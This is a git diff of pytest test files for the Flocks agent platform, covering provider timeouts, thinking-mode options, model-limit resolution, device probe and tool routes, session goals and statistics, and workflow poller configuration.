domain name string."}, 'lang': {'type': 'string', 'description': 'Response language (en or zh)', 'default': 'en', 'enum': ['zh', 'en']}}, 'required': ['domain']}}}, {'type': 'function', 'function': {'name': 'threatbook_file_query', 'description': "Query file hash threat intelligence from ThreatBook API. Use this tool to get malware analysis results, antivirus detection results, and threat information about a file hash. Supports MD5, SHA1, and SHA256 hashes. Example: To query a hash, pass file_hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'.", 'parameters': {'type': 'object', 'properties': {'file_hash': {'type': 'string', 'description': "The file hash to query. Can be MD5, SHA1, or SHA256 format (e.g., 'a1b2c3d4...', '5e6f7a8b...'). This is a required parameter and must be a valid hash string."}, 'lang': {'type': 'string', 'description': 'Response language (en or zh)', 'default': 'en', 'enum': ['zh', 'en']}}, 'required': ['file_hash']}}}]
 
 # ============================================================================
 # Test Functions
diff --git a/tests/provider/test_openai_base_provider.py b/tests/provider/test_openai_base_provider.py
index 6f14efafe..f4beeea4a 100644
--- a/tests/provider/test_openai_base_provider.py
+++ b/tests/provider/test_openai_base_provider.py
@@ -50,6 +50,15 @@ def __init__(self):
 
 class TestOpenAIBaseProviderGetModels:
     """Test suite for get_models() method."""
+
+    def test_default_http_timeout_values(self):
+        """OpenAI-style providers share fail-fast read and long write timeouts."""
+        timeout = openai_base_module.DEFAULT_HTTP_TIMEOUT
+
+        assert timeout.connect == 30.0
+        assert timeout.read == 180.0
+        assert timeout.write == 1800.0
+        assert timeout.pool == 60.0
     
     def test_get_models_with_catalog_success(self):
         """Test get_models() returns configured models."""
@@ -371,10 +380,10 @@ def test_get_client_respects_verify_ssl_false(self, mock_async_openai, mock_http
         timeout_arg = kwargs["timeout"]
         # Either an httpx.Timeout instance or compatible object: assert the
         # connect/read/write components rather than equality so future tweaks
-        # to non-essential pool/write durations don't break the test.
+        # to non-essential pool durations don't break the test.
         assert getattr(timeout_arg, "connect", None) == 30.0
-        assert getattr(timeout_arg, "read", None) == 600.0
-        assert getattr(timeout_arg, "write", None) == 600.0
+        assert getattr(timeout_arg, "read", None) == 180.0
+        assert getattr(timeout_arg, "write", None) == 1800.0
 
         mock_async_openai.assert_called_once_with(
             api_key="test-api-key",
diff --git a/tests/provider/test_thinking_params.py b/tests/provider/test_thinking_params.py
index 4ace790e0..6d838d8fe 100644
--- a/tests/provider/test_thinking_params.py
+++ b/tests/provider/test_thinking_params.py
@@ -347,6 +347,71 @@ def test_explicit_reasoning_toggle_propagates(self) -> None:
         )
         assert options["extra_body"]["enable_thinking"] is False
 
+    @pytest.mark.parametrize(
+        "configured_extra_body",
+        [
+            {"chat_template_kwargs": {"enable_thinking": True}},
+            {"chat_template_kwargs": {"thinking": True}},
+        ],
+    )
+    def test_configured_extra_body_overrides_auto_generic_shape(
+        self,
+        configured_extra_body: Dict[str, Any],
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        """OpenAI-compatible users can declare provider-specific request bodies.
+
+        vLLM/SGLang thinking switches are nested under
+        ``chat_template_kwargs``.  If configured, Flocks should forward the
+        exact shape instead of adding its default ``enable_thinking`` flag for
+        qwen-style generic chat models.
+        """
+        monkeypatch.setattr(
+            provider_options,
+            "_resolve_default_extra_body",
+            lambda *_args, **_kw: configured_extra_body,
+        )
+
+        options = provider_options.build_provider_options(
+            "openai-compatible",
+            "qwen3-7b",
+            resolve_max_tokens=False,
+        )
+
+        assert options.get("extra_body") == configured_extra_body
+
+    @pytest.mark.parametrize(
+        "configured_extra_body",
+        [
+            {"chat_template_kwargs": {"enable_thinking": True}},
+            {"chat_template_kwargs": {"thinking": True}},
+        ],
+    )
+    def test_configured_extra_body_emits_without_interleaved_inference(
+        self,
+        configured_extra_body: Dict[str, Any],
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        """Explicit extra_body config should not depend on model-name inference."""
+        monkeypatch.setattr(
+            provider_options,
+            "_resolve_default_extra_body",
+            lambda *_args, **_kw: configured_extra_body,
+        )
+        monkeypatch.setattr(
+            provider_options,
+            "_resolve_interleaved_capability",
+            lambda *_args, **_kw: None,
+        )
+
+        options = provider_options.build_provider_options(
+            "openai-compatible",
+            "local-sglang-model",
+            resolve_max_tokens=False,
+        )
+
+        assert options.get("extra_body") == configured_extra_body
+
     def test_anthropic_transport_still_uses_thinking_field(
         self, monkeypatch: pytest.MonkeyPatch
     ) -> None:
diff --git a/tests/server/routes/test_custom_provider_runtime.py b/tests/server/routes/test_custom_provider_runtime.py
index 4899ce6ea..0a66aeea2 100644
--- a/tests/server/routes/test_custom_provider_runtime.py
+++ b/tests/server/routes/test_custom_provider_runtime.py
@@ -1,6 +1,16 @@
+import os
+from types import SimpleNamespace
+
+import pytest
+
 from flocks.provider.provider import ModelCapabilities, ModelInfo, Provider
 from flocks.provider.sdk.azure import AzureProvider
-from flocks.server.routes.custom_provider import CreateModelReq, _add_model_to_runtime
+from flocks.server.routes import custom_provider
+from flocks.server.routes.custom_provider import (
+    CreateModelReq,
+    _add_model_to_runtime,
+    _resolve_model_limits,
+)
 
 
 def test_model_info_pricing_accepts_currency_string():
@@ -81,3 +91,231 @@ def test_add_azure_deployment_to_runtime_config_models(monkeypatch):
         assert provider._config_models[0].name == "Customer Production Deployment"
     finally:
         Provider._models = original_models
+
+
+@pytest.mark.asyncio
+async def test_resolve_model_limits_uses_explicit_values():
+    body = CreateModelReq(
+        model_id="gpt-explicit",
+        name="GPT Explicit",
+        context_window=64000,
+        max_output_tokens=16000,
+    )
+
+    resolved = await _resolve_model_limits("custom-openai", body, {"models": {}})
+
+    assert resolved.context_window == 64000
+    assert resolved.max_output_tokens == 16000
+    assert resolved.source == "explicit"
+
+
+@pytest.mark.asyncio
+async def test_resolve_model_limits_uses_existing_provider_config():
+    body = CreateModelReq(model_id="known-model", name="Known Model")
+
+    resolved = await _resolve_model_limits(
+        "custom-openai",
+        body,
+        {
+            "models": {
+                "known-model": {
+                    "context_window": 200000,
+                    "max_output_tokens": 32000,
+                },
+            },
+        },
+    )
+
+    assert resolved.context_window == 200000
+    assert resolved.max_output_tokens == 32000
+    assert resolved.source == "catalog"
+
+
+@pytest.mark.asyncio
+async def test_resolve_model_limits_uses_flocks_catalog(monkeypatch):
+    body = CreateModelReq(model_id="catalog-model", name="Catalog Model")
+    model_def = SimpleNamespace(
+        id="catalog-model",
+        limits=SimpleNamespace(
+            context_window=131072,
+            max_output_tokens=8192,
+        ),
+        capabilities=None,
+    )
+
+    monkeypatch.setattr(
+        "flocks.provider.model_catalog.get_provider_model_definitions",
+        lambda provider_id: [model_def],
+    )
+
+    resolved = await _resolve_model_limits("openai", body, {"models": {}})
+
+    assert resolved.context_window == 131072
+    assert resolved.max_output_tokens == 8192
+    assert resolved.source == "catalog"
+
+
+@pytest.mark.asyncio
+async def test_resolve_model_limits_uses_models_dev(monkeypatch):
+    body = CreateModelReq(model_id="gpt-models-dev", name="GPT Models Dev")
+
+    async def fake_fetch_models_dev():
+        return {
+            "openai": {
+                "models": {
+                    "gpt-models-dev": {
+                        "limit": {
+                            "context": 128000,
+                            "output": 16384,
+                        },
+                    },
+                },
+            },
+        }
+
+    monkeypatch.setattr(custom_provider, "_fetch_models_dev", fake_fetch_models_dev)
+
+    resolved = await _resolve_model_limits("custom-openai", body, {"models": {}})
+
+    assert resolved.context_window == 128000
+    assert resolved.max_output_tokens == 16384
+    assert resolved.source == "models_dev"
+
+
+@pytest.mark.asyncio
+async def test_resolve_model_limits_uses_models_dev_model_prefix(monkeypatch):
+    body = CreateModelReq(
+        model_id="deepseek:deepseek-v4-flash",
+        name="DeepSeek V4 Flash",
+    )
+
+    async def fake_fetch_models_dev():
+        return {
+            "deepseek": {
+                "models": {
+                    "deepseek-v4-flash": {
+                        "limit": {
+                            "context": 1000000,
+                            "output": 384000,
+                        },
+                    },
+                },
+            },
+        }
+
+    monkeypatch.setattr(custom_provider, "_fetch_models_dev", fake_fetch_models_dev)
+
+    resolved = await _resolve_model_limits("custom-tb-local", body, {"models": {}})
+
+    assert resolved.context_window == 1000000
+    assert resolved.max_output_tokens == 384000
+    assert resolved.source == "models_dev"
+
+
+@pytest.mark.asyncio
+@pytest.mark.parametrize(
+    ("provider_id", "model_id", "expected_context", "expected_output", "expected_source"),
+    [
+        ("custom-deepseek", "deepseek-v4", 128000, 8192, "fallback"),
+        ("custom-deepseek", "deepseek-v4-flash", 1000000, 384000, "models_dev"),
+        ("custom-anything", "deepseek:deepseek-v4-flash", 1000000, 384000, "models_dev"),
+        ("custom-bailian", "bailian:deepseek-v4-flash", 128000, 8192, "fallback"),
+        ("openrouter", "deepseek/deepseek-v4-flash", 1048576, 131072, "models_dev"),
+    ],
+)
+async def test_resolve_model_limits_auto_detects_common_model_inputs(
+    monkeypatch,
+    provider_id,
+    model_id,
+    expected_context,
+    expected_output,
+    expected_source,
+):
+    body = CreateModelReq(model_id=model_id, name=model_id)
+
+    async def fake_fetch_models_dev():
+        return {
+            "deepseek": {
+                "models": {
+                    "deepseek-v4-flash": {
+                        "limit": {
+                            "context": 1000000,
+                            "output": 384000,
+                        },
+                    },
+                    "deepseek-v4-pro": {
+                        "limit": {
+                            "context": 1000000,
+                            "output": 384000,
+                        },
+                    },
+                },
+            },
+            "alibaba": {"models": {}},
+            "openrouter": {
+                "models": {
+                    "deepseek/deepseek-v4-flash": {
+                        "limit": {
+                            "context": 1048576,
+                            "output": 131072,
+                        },
+                    },
+                },
+            },
+        }
+
+    monkeypatch.setattr(custom_provider, "_fetch_models_dev", fake_fetch_models_dev)
+
+    resolved = await _resolve_model_limits(provider_id, body, {"models": {}})
+
+    assert resolved.context_window == expected_context
+    assert resolved.max_output_tokens == expected_output
+    assert resolved.source == expected_source
+
+
+@pytest.mark.live
+@pytest.mark.skipif(
+    os.environ.get("FLOCKS_LIVE_TEST") != "1",
+    reason="requires live models.dev network access",
+)
+@pytest.mark.asyncio
+@pytest.mark.parametrize(
+    ("provider_id", "model_id", "expected_context", "expected_output", "expected_source"),
+    [
+        ("custom-deepseek", "deepseek-v4", 128000, 8192, "fallback"),
+        ("custom-deepseek", "deepseek-v4-flash", 1000000, 384000, "models_dev"),
+        ("custom-anything", "deepseek:deepseek-v4-flash", 1000000, 384000, "models_dev"),
+        ("custom-bailian", "bailian:deepseek-v4-flash", 128000, 8192, "fallback"),
+        ("openrouter", "deepseek/deepseek-v4-flash", 1048576, 131072, "models_dev"),
+    ],
+)
+async def test_resolve_model_limits_live_models_dev_auto_detects_current_inputs(
+    provider_id,
+    model_id,
+    expected_context,
+    expected_output,
+    expected_source,
+):
+    body = CreateModelReq(model_id=model_id, name=model_id)
+
+    resolved = await _resolve_model_limits(provider_id, body, {"models": {}})
+
+    assert resolved.context_window == expected_context
+    assert resolved.max_output_tokens == expected_output
+    assert resolved.source == expected_source
+
+
+@pytest.mark.asyncio
+async def test_resolve_model_limits_falls_back_when_models_dev_unavailable(monkeypatch):
+    body = CreateModelReq(model_id="unknown-model", name="Unknown Model")
+
+    async def fake_fetch_models_dev():
+        return None
+
+    monkeypatch.setattr(custom_provider, "_fetch_models_dev", fake_fetch_models_dev)
+
+    resolved = await _resolve_model_limits("custom-openai", body, {"models": {}})
+
+    assert resolved.context_window == custom_provider.FALLBACK_CONTEXT_WINDOW
+    assert resolved.max_output_tokens == custom_provider.FALLBACK_MAX_OUTPUT_TOKENS
+    assert resolved.source == "fallback"
diff --git a/tests/server/routes/test_device_routes.py b/tests/server/routes/test_device_routes.py
index 13abfca55..b18200fdf 100644
--- a/tests/server/routes/test_device_routes.py
+++ b/tests/server/routes/test_device_routes.py
@@ -13,13 +13,17 @@
 from __future__ import annotations
 
 import json
+from types import SimpleNamespace
 from typing import Dict, Optional
+from unittest.mock import AsyncMock
 
 import pytest
 from httpx import AsyncClient
 
 from flocks.server.routes import device as device_routes
+from flocks.tool.device import intake as device_intake
 from flocks.tool.device.models import DeviceTestResult
+from flocks.tool.registry import ToolCategory, ToolInfo
 
 
 def _fake_row(*, fields: Dict[str, str], verify_ssl: bool = False) -> dict:
@@ -43,8 +47,7 @@ def _install_route_stubs(
     probe_result: DeviceTestResult,
     captured: dict,
 ) -> None:
-    """Stub out fetch_device, _probe and record_test_result on the
-    routes module so the test stays isolated from DB / network."""
+    """Stub out intake dependencies so the test stays isolated from DB / network."""
 
     async def fake_fetch_device(device_id: str):
         captured["device_id"] = device_id
@@ -60,13 +63,13 @@ async def fake_record(device_id, *, success, message, latency_ms):
             {"device_id": device_id, "success": success, "message": message}
         )
 
-    monkeypatch.setattr(device_routes, "fetch_device", fake_fetch_device)
-    monkeypatch.setattr(device_routes, "_probe", fake_probe)
-    monkeypatch.setattr(device_routes, "record_test_result", fake_record)
+    monkeypatch.setattr(device_intake, "fetch_device", fake_fetch_device)
+    monkeypatch.setattr(device_intake, "_probe", fake_probe)
+    monkeypatch.setattr(device_intake, "record_test_result", fake_record)
     # secrets resolution: return the persisted dict untouched so tests can
     # drive the field values directly.
     monkeypatch.setattr(
-        device_routes,
+        device_intake,
         "resolve_for_runtime",
         lambda db_fields: dict(db_fields),
     )
@@ -156,6 +159,81 @@ async def test_form_override_base_url_wins_over_persisted_host(
         assert resp.status_code == 200, resp.text
         assert captured["probed_base_url"] == "https://staging.example.com"
 
+    @pytest.mark.asyncio
+    async def test_draft_fields_win_over_persisted_fields_for_probe(
+        self, client: AsyncClient, monkeypatch: pytest.MonkeyPatch
+    ):
+        captured: dict = {}
+        _install_route_stubs(
+            monkeypatch,
+            row=_fake_row(fields={"base_url": "https://persisted.example.com"}),
+            probe_result=DeviceTestResult(success=True, message="ok"),
+            captured=captured,
+        )
+
+        resp = await client.post(
+            "/api/devices/dev-test/test",
+            json={"fields": {"base_url": "https://draft.example.com"}},
+        )
+
+        assert resp.status_code == 200, resp.text
+        assert captured["probed_base_url"] == "https://draft.example.com"
+        assert captured["record_calls"] == [
+            {"device_id": "dev-test", "success": True, "message": "ok"}
+        ]
+
+    @pytest.mark.asyncio
+    async def test_masked_draft_secret_keeps_persisted_secret(
+        self, client: AsyncClient, monkeypatch: pytest.MonkeyPatch
+    ):
+        captured: dict = {}
+        _install_route_stubs(
+            monkeypatch,
+            row=_fake_row(
+                fields={
+                    "base_url": "https://persisted.example.com",
+                    "password": "{secret:device_dev-test_password}",
+                }
+            ),
+            probe_result=DeviceTestResult(success=True, message="ok"),
+            captured=captured,
+        )
+        monkeypatch.setattr(
+            device_intake,
+            "resolve_for_runtime",
+            lambda db_fields: {
+                **db_fields,
+                "password": "real-password",
+            },
+        )
+        monkeypatch.setattr(
+            device_intake,
+            "mask_for_display",
+            lambda db_fields: (
+                {
+                    "base_url": "https://persisted.example.com",
+                    "password": "r***word",
+                },
+                {"base_url": True, "password": True},
+            ),
+        )
+
+        resolved = device_intake._resolve_test_fields(
+            {
+                "base_url": "https://persisted.example.com",
+                "password": "{secret:device_dev-test_password}",
+            },
+            device_intake.DeviceTestRequest(fields={"password": "r***word"}),
+        )
+        resp = await client.post(
+            "/api/devices/dev-test/test",
+            json={"fields": {"password": "r***word"}},
+        )
+
+        assert resp.status_code == 200, resp.text
+        assert resolved["password"] == "real-password"
+        assert captured["probed_base_url"] == "https://persisted.example.com"
+
     @pytest.mark.asyncio
     async def test_error_message_mentions_both_base_url_and_host(
         self, client: AsyncClient, monkeypatch: pytest.MonkeyPatch
@@ -192,7 +270,7 @@ async def test_returns_404_for_unknown_device(
         async def fake_fetch_device(device_id: str):
             return None
 
-        monkeypatch.setattr(device_routes, "fetch_device", fake_fetch_device)
+        monkeypatch.setattr(device_intake, "fetch_device", fake_fetch_device)
 
         resp = await client.post("/api/devices/missing-id/test", json={})
 
@@ -258,3 +336,163 @@ async def fake_fetch_device(device_id: str):
         resp = await client.post("/api/devices/missing-id/credentials", json={})
 
         assert resp.status_code == 404
+
+
+class TestDeviceToolEndpoint:
+    @staticmethod
+    def _tool(*, enabled: bool = True):
+        return SimpleNamespace(
+            info=ToolInfo(
+                name="onesig_login",
+                description="OneSIG login",
+                category=ToolCategory.CUSTOM,
+                enabled=enabled,
+                source="device",
+                provider="onesig_api_v2_5_3_D20260321",
+            )
+        )
+
+    @pytest.mark.asyncio
+    async def test_enable_deletes_per_device_override_without_writing_true(
+        self, monkeypatch: pytest.MonkeyPatch
+    ):
+        calls: dict[str, object] = {}
+        tool = self._tool(enabled=True)
+
+        async def fake_delete(device_id: str, tool_name: str):
+            calls["delete"] = (device_id, tool_name)
+            return True
+
+        async def fake_set(device_id: str, tool_name: str, enabled: bool):
+            calls["set"] = (device_id, tool_name, enabled)
+
+        monkeypatch.setattr(
+            device_routes,
+            "fetch_device",
+            AsyncMock(return_value={"storage_key": "onesig_api_v2_5_3_D20260321"}),
+        )
+        monkeypatch.setattr("flocks.tool.registry.ToolRegistry.init", lambda: None)
+        monkeypatch.setattr("flocks.tool.registry.ToolRegistry.get", lambda _name: tool)
+        monkeypatch.setattr(device_routes, "delete_device_tool_setting", fake_delete)
+        monkeypatch.setattr(device_routes, "set_device_tool_enabled", fake_set)
+
+        result = await device_routes.route_update_device_tool(
+            "dev-a",
+            "onesig_login",
+            device_routes.DeviceToolUpdateRequest(enabled=True),
+        )
+
+        assert calls["delete"] == ("dev-a", "onesig_login")
+        assert "set" not in calls
+        assert result.enabled_global is True
+        assert result.enabled_device is None
+        assert result.enabled_effective is True
+
+    @pytest.mark.asyncio
+    async def test_enable_global_tool_when_device_tool_enabled(
+        self, monkeypatch: pytest.MonkeyPatch
+    ):
+        calls: dict[str, object] = {}
+        tool = self._tool(enabled=False)
+
+        async def fake_delete(device_id: str, tool_name: str):
+            calls["delete"] = (device_id, tool_name)
+            return False
+
+        def fake_global_enable(target_tool, desired: bool):
+            calls["global_enable"] = (target_tool.info.name, desired)
+            target_tool.info.enabled = desired
+            return desired
+
+        monkeypatch.setattr(
+            device_routes,
+            "fetch_device",
+            AsyncMock(return_value={"storage_key": "onesig_api_v2_5_3_D20260321"}),
+        )
+        monkeypatch.setattr("flocks.tool.registry.ToolRegistry.init", lambda: None)
+        monkeypatch.setattr("flocks.tool.registry.ToolRegistry.get", lambda _name: tool)
+        monkeypatch.setattr(device_routes, "delete_device_tool_setting", fake_delete)
+        monkeypatch.setattr(
+            "flocks.server.routes.tool._set_global_tool_enabled",
+            fake_global_enable,
+        )
+
+        result = await device_routes.route_update_device_tool(
+            "dev-a",
+            "onesig_login",
+            device_routes.DeviceToolUpdateRequest(enabled=True),
+        )
+
+        assert calls["global_enable"] == ("onesig_login", True)
+        assert calls["delete"] == ("dev-a", "onesig_login")
+        assert result.enabled_global is True
+        assert result.enabled_device is None
+        assert result.enabled_effective is True
+
+
+class TestDeviceSyncEndpoint:
+    @pytest.mark.asyncio
+    async def test_list_devices_does_not_invoke_auto_instance_creation(
+        self, client: AsyncClient, monkeypatch: pytest.MonkeyPatch
+    ):
+        async def fail_ensure_user_device_instances(*, refresh_templates: bool):
+            raise AssertionError("GET /api/devices must stay read-only")
+
+        monkeypatch.setattr(
+            device_routes,
+            "ensure_user_device_instances",
+            fail_ensure_user_device_instances,
+        )
+        async def fake_list_devices(group_id=None):
+            return []
+
+        monkeypatch.setattr(device_routes, "list_devices", fake_list_devices)
+
+        resp = await client.get("/api/devices?refresh=true")
+
+        assert resp.status_code == 200, resp.text
+        assert resp.json() == []
+
+    @pytest.mark.asyncio
+    async def test_sync_invokes_auto_instance_creation_with_refresh_flag(
+        self, client: AsyncClient, monkeypatch: pytest.MonkeyPatch
+    ):
+        captured: dict = {}
+
+        async def fake_ensure_user_device_instances(*, refresh_templates: bool):
+            captured["refresh_templates"] = refresh_templates
+            return 3
+
+        monkeypatch.setattr(
+            device_routes,
+            "ensure_user_device_instances",
+            fake_ensure_user_device_instances,
+        )
+
+        resp = await client.post("/api/devices/sync?refresh=true")
+
+        assert resp.status_code == 200, resp.text
+        assert resp.json() == {"created": 3}
+        assert captured["refresh_templates"] is True
+
+    @pytest.mark.asyncio
+    async def test_sync_allows_non_refresh_sync(
+        self, client: AsyncClient, monkeypatch: pytest.MonkeyPatch
+    ):
+        captured: dict = {}
+
+        async def fake_ensure_user_device_instances(*, refresh_templates: bool):
+            captured["refresh_templates"] = refresh_templates
+            return 0
+
+        monkeypatch.setattr(
+            device_routes,
+            "ensure_user_device_instances",
+            fake_ensure_user_device_instances,
+        )
+
+        resp = await client.post("/api/devices/sync?refresh=false")
+
+        assert resp.status_code == 200, resp.text
+        assert resp.json() == {"created": 0}
+        assert captured["refresh_templates"] is False
diff --git a/tests/server/routes/test_remaining_routes.py b/tests/server/routes/test_remaining_routes.py
index 863147831..f36aa98b3 100644
--- a/tests/server/routes/test_remaining_routes.py
+++ b/tests/server/routes/test_remaining_routes.py
@@ -224,6 +224,30 @@ async def test_update_workflow(self, client: AsyncClient):
         assert resp.status_code == status.HTTP_200_OK
         assert resp.json()["name"] == "updated-workflow"
 
+    @pytest.mark.asyncio
+    async def test_update_workflow_writes_workflow_md_only(
+        self,
+        client: AsyncClient,
+        isolated_workflow_filesystem,
+    ):
+        """PUT /api/workflow/{id} stores editable markdown in workflow.md."""
+        create_resp = await client.post("/api/workflow", json=_WORKFLOW_PAYLOAD)
+        wf_id = create_resp.json()["id"]
+        workflow_dir = isolated_workflow_filesystem["global_root"] / wf_id
+        legacy_edit_file = workflow_dir / "workflow.edit.md"
+        legacy_edit_file.write_text("# legacy\n", encoding="utf-8")
+
+        resp = await client.put(
+            f"/api/workflow/{wf_id}",
+            json={"markdownContent": "# current\n"},
+        )
+
+        assert resp.status_code == status.HTTP_200_OK, resp.text
+        assert resp.json()["markdownContent"] == "# current\n"
+        assert resp.json()["editMarkdownContent"] == "# current\n"
+        assert (workflow_dir / "workflow.md").read_text(encoding="utf-8") == "# current\n"
+        assert not legacy_edit_file.exists()
+
     @pytest.mark.asyncio
     async def test_delete_workflow(self, client: AsyncClient):
         """DELETE /api/workflow/{id} removes the workflow."""
diff --git a/tests/server/routes/test_session_routes.py b/tests/server/routes/test_session_routes.py
index 39ae2765b..c7977be9c 100644
--- a/tests/server/routes/test_session_routes.py
+++ b/tests/server/routes/test_session_routes.py
@@ -65,6 +65,24 @@ async def test_create_session_with_category(self, client: AsyncClient):
         assert resp.status_code == status.HTTP_200_OK
         assert resp.json()["category"] == "workflow"
 
+    @pytest.mark.asyncio
+    async def test_get_session_includes_persisted_goal(self, client: AsyncClient):
+        """GET /api/session/{id} hydrates persisted goal state for the WebUI."""
+        from flocks.session.goal import GoalManager
+
+        create_resp = await client.post("/api/session", json={"title": "Goal Session"})
+        assert create_resp.status_code == status.HTTP_200_OK
+        session_id = create_resp.json()["id"]
+        await GoalManager.set_goal(session_id, "List built-in tools")
+
+        resp = await client.get(f"/api/session/{session_id}")
+        assert resp.status_code == status.HTTP_200_OK
+        assert resp.json()["goal"] == {
+            "status": "active",
+            "objective": "List built-in tools",
+            "reason": None,
+        }
+
     @pytest.mark.asyncio
     async def test_list_sessions_empty(self, client: AsyncClient):
         """GET /api/session returns an empty list when no sessions exist."""
@@ -367,6 +385,42 @@ async def test_non_owner_cannot_change_share_or_continue_session(
 
 
 class TestSessionMessagesRemaining:
+    @pytest.mark.asyncio
+    @pytest.mark.parametrize(
+        ("path_suffix", "payload"),
+        [
+            ("/message", {"parts": [{"type": "text", "text": "blocked"}], "agent": "disabled-agent"}),
+            ("/prompt_async", {"parts": [{"type": "text", "text": "blocked"}], "agent": "disabled-agent"}),
+            ("/prompt_queue", {"parts": [{"type": "text", "text": "blocked"}], "agent": "disabled-agent"}),
+            ("/command", {"command": "help", "agent": "disabled-agent"}),
+        ],
+    )
+    async def test_input_routes_reject_disabled_agents(
+        self,
+        client: AsyncClient,
+        session_id: str,
+        monkeypatch: pytest.MonkeyPatch,
+        path_suffix: str,
+        payload: dict,
+    ):
+        """Disabled subagents cannot be used through direct session input APIs."""
+        monkeypatch.setattr(
+            "flocks.agent.registry.Agent.get",
+            AsyncMock(return_value=SimpleNamespace(
+                name="disabled-agent",
+                mode="subagent",
+                delegatable=False,
+                hidden=False,
+                tags=[],
+                model=None,
+            )),
+        )
+
+        resp = await client.post(f"/api/session/{session_id}{path_suffix}", json=payload)
+
+        assert resp.status_code == status.HTTP_400_BAD_REQUEST
+        assert resp.json()["message"] == 'Agent "disabled-agent" is disabled'
+
     @pytest.mark.asyncio
     async def test_send_message_empty_parts_returns_success(
         self, client: AsyncClient, session_id: str
@@ -943,17 +997,25 @@ class TestSessionUtilities:
     @pytest.mark.asyncio
     async def test_clear_session(self, client: AsyncClient, session_id: str):
         """POST /api/session/{id}/clear removes messages."""
+        from flocks.session.goal import GoalManager
+
         # Add a message first
         await client.post(
             f"/api/session/{session_id}/message",
             json={"parts": [{"type": "text", "text": "msg"}], "noReply": True},
         )
+        await GoalManager.set_goal(session_id, "List built-in tools")
         clear_resp = await client.post(f"/api/session/{session_id}/clear")
         assert clear_resp.status_code == status.HTTP_200_OK
 
         # Messages should be gone
         list_resp = await client.get(f"/api/session/{session_id}/message")
         assert list_resp.json() == []
+        assert await GoalManager.get(session_id) is None
+
+        session_resp = await client.get(f"/api/session/{session_id}")
+        assert session_resp.status_code == status.HTTP_200_OK
+        assert session_resp.json()["goal"] is None
 
     @pytest.mark.asyncio
     async def test_clear_session_clears_prompt_queue(self, client: AsyncClient, session_id: str):
@@ -1045,6 +1107,26 @@ async def test_abort_session(self, client: AsyncClient, session_id: str):
         resp = await client.post(f"/api/session/{session_id}/abort")
         assert resp.status_code == status.HTTP_200_OK
 
+    @pytest.mark.asyncio
+    async def test_session_statistics(self, client: AsyncClient, session_id: str):
+        """GET /api/session/{id}/statistics reports stored session messages."""
+        payload = {
+            "parts": [{"type": "text", "text": "Hello from statistics"}],
+            "noReply": True,
+        }
+        message_resp = await client.post(f"/api/session/{session_id}/message", json=payload)
+        assert message_resp.status_code == status.HTTP_200_OK
+
+        resp = await client.get(f"/api/session/{session_id}/statistics")
+        assert resp.status_code == status.HTTP_200_OK
+
+        data = resp.json()
+        assert data["sessionID"] == session_id
+        assert data["messageCount"] == 1
+        assert data["tokenCount"] >= 3
+        assert data["toolCallCount"] == 0
+        assert data["durationSeconds"] >= 0
+
     @pytest.mark.asyncio
     async def test_session_status(self, client: AsyncClient):
         """GET /api/session/status returns aggregate status."""
diff --git a/tests/server/routes/test_user_defined_pages_routes.py b/tests/server/routes/test_user_defined_pages_routes.py
index 8d35ec577..686a10d33 100644
--- a/tests/server/routes/test_user_defined_pages_routes.py
+++ b/tests/server/routes/test_user_defined_pages_routes.py
@@ -83,9 +83,17 @@ async def test_save_source_triggers_build_and_event(client: AsyncClient, user_de
 @pytest.mark.asyncio
 async def test_bundle_endpoint_available_after_create(client: AsyncClient, user_defined_pages_env: UserDefinedPagesStore):
     await client.post("/api/user-defined-pages", json={"id": "empty-page", "title": "空页面"})
+    bundle_path = user_defined_pages_env.bundle_path("empty-page")
+    bundle_path.parent.mkdir(parents=True, exist_ok=True)
+    bundle_path.write_text("export default function Page(){return null;}", encoding="utf-8")
+    user_defined_pages_env.write_build_meta(
+        "empty-page",
+        UserDefinedPageBuildMeta(status="ready", hash="test-hash", builtAt=1),
+    )
     bundle_resp = await client.get("/api/user-defined-pages/empty-page/bundle.js")
     assert bundle_resp.status_code == 200
     assert "application/javascript" in bundle_resp.headers.get("content-type", "")
+    assert "content-disposition" not in bundle_resp.headers
     assert bundle_resp.text.strip()
 
 
diff --git a/tests/server/routes/test_workflow_poller_routes.py b/tests/server/routes/test_workflow_poller_routes.py
index 9baf2d2dc..ff8679fd2 100644
--- a/tests/server/routes/test_workflow_poller_routes.py
+++ b/tests/server/routes/test_workflow_poller_routes.py
@@ -56,6 +56,64 @@ async def _fake_restart(workflow_id: str) -> dict[str, Any]:
     assert payload["inputs"] == {"persist_triage_output": True}
 
 
+@pytest.mark.asyncio
+async def test_save_poller_config_preserves_cron_schedule(
+    client: AsyncClient,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    writes: list[tuple[str, dict[str, Any]]] = []
+    persisted_sources: list[dict[str, Any]] = []
+
+    async def _fake_write(key: Any, value: dict[str, Any]) -> None:
+        writes.append((key, value))
+
+    async def _fake_persist(
+        _workflow_id: str,
+        _workflow_data: dict[str, Any],
+        triggers: list[Any],
+    ) -> None:
+        persisted_sources.extend(dict(trigger.source or {}) for trigger in triggers if trigger.type == "schedule")
+
+    async def _fake_restart(workflow_id: str) -> dict[str, Any]:
+        assert workflow_id == "wf-1"
+        return {"workflowId": workflow_id, "state": "running", "cronExpression": "*/10 * * * *"}
+
+    monkeypatch.setattr(
+        workflow_routes,
+        "_read_workflow_from_fs",
+        lambda workflow_id: {"workflowJson": {"start": "n1", "nodes": [], "edges": []}} if workflow_id == "wf-1" else None,
+    )
+    monkeypatch.setattr(workflow_routes.Storage, "write", _fake_write)
+    monkeypatch.setattr(workflow_routes, "_persist_workflow_triggers", _fake_persist)
+    monkeypatch.setattr(
+        "flocks.workflow.poller_manager.default_manager",
+        SimpleNamespace(restart_workflow=_fake_restart),
+    )
+
+    response = await client.post(
+        "/api/workflow/wf-1/poller-config",
+        json={
+            "enabled": True,
+            "intervalSeconds": 300,
+            "cronExpression": "*/10 * * * *",
+            "timeoutSeconds": 3600,
+            "noOverlap": True,
+            "inputs": {"source": "cron"},
+        },
+    )
+
+    assert response.status_code == 200, response.text
+    poller_payload = next(value for key, value in writes if key == "workflow_poller_config/wf-1")
+    assert poller_payload["cronExpression"] == "*/10 * * * *"
+    assert persisted_sources == [
+        {
+            "mode": "cron",
+            "intervalSeconds": 300,
+            "cron": "*/10 * * * *",
+        }
+    ]
+
+
 @pytest.mark.asyncio
 async def test_get_poller_config_returns_saved_data(
     client: AsyncClient,
